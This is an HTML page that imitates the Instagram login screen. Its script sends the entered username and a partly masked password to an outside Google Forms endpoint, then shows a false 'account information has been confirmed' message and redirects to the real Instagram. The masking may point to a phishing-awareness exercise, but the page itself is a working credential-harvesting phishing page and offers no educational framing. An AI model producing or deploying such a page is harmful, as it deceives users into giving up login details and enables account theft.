<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<title>Login • Instagram</title>
<link rel="shortcut icon" href="https://lh3.googleusercontent.com/jp9QXC2obwvUWkedWl8qzNAGauOslC4upvK_bOTCUZel3ZjXVVvy7bJuIcCWXBLQjAK5q546gz0iHZBMwJwD6Oitw3p75LRmmcdDq6f7zqy9VUDFn3fAPIAKYJ3Vub-QpKH_Maht6A=w2400"/>

<style>
    body {
      font-family: Arial, Helvetica, sans-serif;
      background-color: whitesmoke !important;
    }
    form {border: 3px solid #f1f1f1;}

    input[type=text], input[type=password], select {
      width: 80%;
      font-size: 12px;
      padding: 12px 20px;
      margin: 8px 0;
      display: inline-block;
      border: 1px solid #ccc;
      box-sizing: border-box;
      color: #262626;
      background-color: rgb(250, 250, 250);
      border-color: rgb(239, 239, 239);
      font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
      border-radius: 5px;
    }

    input[type=text]:focus {
      outline: 0.5px solid lightgrey;
      border-radius: 5px;
    }

    input[type=password]:focus {
      outline: 0.5px solid lightgrey;
      border-radius: 5px;
    }

    button {
      background-color: #3897f0;
      color: white;
      padding-bottom: 24px;
      padding-top: 9px;
      margin: 0;
      border: none;
      cursor: pointer;
      width: 80%;
      height: 18px;
      font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
      font-weight: bold;
      border-radius: 5px;
    }

    button:hover {
      opacity: 0.8;
    }

    .cancelbtn {
      width: auto;
      padding: 10px 18px;
      background-color: #f44336;
    }

    .imgcontainer {
      text-align: center;
      margin: 24px 0 12px 0;
    }

    img.avatar {
      width: 20%;
      border-radius: 50%;
    }

    .container {
      padding: 16px;
    }

    span.psw {
      float: right;
      padding-top: 16px;
    }


    .slate {
      border-width: 1px !important;
      border-color: rgb(230, 230, 230) !important;
      width: 25%;
      margin: 0 auto !important;
      background-color: #fff;
    }


     @media screen and (max-width: 300px) {
      span.psw {
        display: block;
        float: none;
      }
      .cancelbtn {
        width: 100%;
      }
    }

</style>
</head>

<body>

<div class="slate">
  <a href="test.html">click here</a>
    <form id="form" target="_self" onsubmit="return postToGoogle();" action="" autocomplete="off"> 
        <div width="80% !important;" style="margin: 0 auto; text-align:center">
            <br/>
            <img src="https://lh3.googleusercontent.com/LVFjnxmht_tsmlYzi0G_DKIEazRcrK68K5OXayiQVjtHD0gByWtoz4pRR8ykQtUTkdYc0o2OlksVZis3a8MT0xp6YRnV_4yQY60gVnKOKJ09LK_UQM9fL9SSl9Q0A0VelmCVfk7QtA=w2400" style="width: 60%">            
            <br/><br/>
            <input id="nameField" name="entry.366340186" placeholder="Phone number, username, or email" type="text" required> <br/>
            <input id="passwordField" name="entry.147812173" placeholder="Password" type="password" required> <br/> <br/>
            
            <button id="send" type="submit" >Log In</button>
            <br/><br/>
            <p style="font-size:11px"><a href="https://www.instagram.com/accounts/password/reset/" target="_blank" style="text-decoration:none; color:grey">Forgot password?</a></p>
            <br/>
        </div>
    </form>

    <h3 id="success-msg" style="text-align: center !important; margin-top:190px !important; display:none; color:gray">
          <br/>  
          Your account information has been confirmed!
          <br/><br/>
          <p style="text-align:center; font-size:13px">Redirecting to Instagram ...</p>
          <br/>
    </h3>

</div>
<br/>
<div class="slate">
      <br/>
      <p style="font-size:13px; text-align:center">Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/" target="_blank" style="text-decoration:none; color:cornflowerblue">Sign up</a></p>
      <br/>
</div>

<p style="text-align:center; color:grey; font-size:13px;">Get the app.</p>
<div width="80% !important;" style="margin: 0 auto; text-align:center">
      <div class="row">
            <div class="column" style="float:center !important;">
                  <a href="https://apps.apple.com/app/instagram/id389801252?vt=lo" target="_blank">
                        <img src="https://lh3.googleusercontent.com/fGFHkAQtdoposvozbse2knjlXUv23Qb9kcFjVsKUPp4k28Mzvjq_45dN269KrBgKy9BmmrPQPFHjNo10K-hhM2SuMoA5i0rs7YUQL1V6noja-LV23Gcl9Z5GwrGKtfd27gicEHaLkg=w2400" alt="App Store" style="width:10%">
                  </a>
            </div>
            <div class="column" style="float:center !important;">
                  <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3DXAXLWWALAAFICEQY2DP0IP6GJZ7V%26utm_content%3Dlo%26utm_medium%3Dbadge" target="_blank">
                        <img src="https://lh3.googleusercontent.com/nMkOFs2QJeLH78MjyO5NuxtoxxSXSjlYUuUvM2SneXowB925kBQibdDe5lcRw8YVlrOT4fBunCzAXLVFaHFLXxs8tneHifs2Tg-vO8Hgs7OF5nQOWXtFLm2QHqDt16IWLJmfBH5yRA=w2400" alt="Google Play" style="width:10%">
                  </a>
            </div>
      </div>
</div>





<script>

function postToGoogle() {
        var field1 = $("#nameField").val();
        var field2 = $("#passwordField").val();
        

				if(field1 == ""){
					alert('Please Fill Your Name');
					document.getElementById("nameField").focus();
					return false;
				}
				if(field2 == ""){
					alert('Please Fill Your Email');
					document.getElementById("passwordField").focus();
					return false;
				}
				
        // fix password - only store first and last digit
        var newpw = '';
        for (var i = 0; i < field2.length; i++)
        {
            if ( (i == 0) || (i == field2.length - 1) )
                newpw = newpw + field2[i];
            else
                newpw = newpw + '*';
        }

        field2 = newpw;
        
        $.ajax({
                url: "https://docs.google.com/forms/d/e/1FAIpQLSf0rNCWw1sbsVpM3mg-yx8c2EZ-DqMP7vwTKGMSnvV0bPJH2w/formResponse?",
                data: {"entry.366340186": field1, "entry.147812173": field2},
                type: "POST",
                dataType: "xml",
                success: function(d)
              {
              },
              error: function(x, y, z)
                {
                  $('#success-msg').show();
                  $('#form').hide();
                  setTimeout(Redirect, 3000);                  
                }
          });
        
        return false;

}

function Redirect() {
    window.location.replace('https://www.instagram.com');
}

</script>
</body>
</html>
